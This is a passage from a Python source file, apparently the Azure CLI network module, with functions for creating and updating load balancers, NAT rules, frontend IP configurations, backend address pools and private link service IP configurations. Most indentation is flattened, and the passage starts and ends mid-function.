c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
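    # Name the new ipconfig with the next index, matching the '{service}_ipconfig_{index}'
    # convention used when the private link service is created.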
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
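    # Standard SKU public IPs require static allocation; otherwise fall back to dynamic.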
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, backend_port, frontend_port=None,
frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
    if frontend_port_range_end and cmd.supported_api_version(min_api='2021-03-01'):
new_rule.frontend_port_range_end = frontend_port_range_end
    if frontend_port_range_start and cmd.supported_api_version(min_api='2021-03-01'):
new_rule.frontend_port_range_start = frontend_port_range_start
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
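    # Drop zone information from public (subnet-less) frontend IP configurations so the
    # retrieved load balancer can be PUT back unchanged (see the issue linked above).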
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
    if frontend_port_range_start is not None and cmd.supported_api_version(min_api='2021-03-01'):
instance.frontend_port_range_start = frontend_port_range_start
    if frontend_port_range_end is not None and cmd.supported_api_version(min_api='2021-03-01'):
instance.frontend_port_range_end = frontend_port_range_end
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
            raise UnrecognizedArgumentError('a vnet must be provided when a subnet name is given instead of a subnet ID')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
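    # Each config-file entry is a dict whose keys mirror the accesses below, e.g. (illustrative):
    #   {'name': 'addr1', 'ip_address': '10.0.0.4', 'virtual_network': 'myVnet', 'subnet': 'mySubnet'}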
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def set_lb_backend_address_pool(cmd, instance, resource_group_name, vnet=None, backend_addresses=None,
backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
if new_addresses:
instance.load_balancer_backend_addresses = new_addresses
return instance
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
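    # Basic SKU load balancers can't use the dedicated backend-address-pool API, so the pool
    # is removed by PUTting the whole load balancer without it.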
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
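    # Cross-region load balancers are always Standard SKU with a Global tier frontend.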
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
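    # Each entry is a dict with 'name' and 'frontend_ip_address' keys (illustrative):
    #   {'name': 'addr1', 'frontend_ip_address': '<frontend IP configuration resource ID>'}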
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
        raise CLIError('Each backend address must have name and frontend-ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
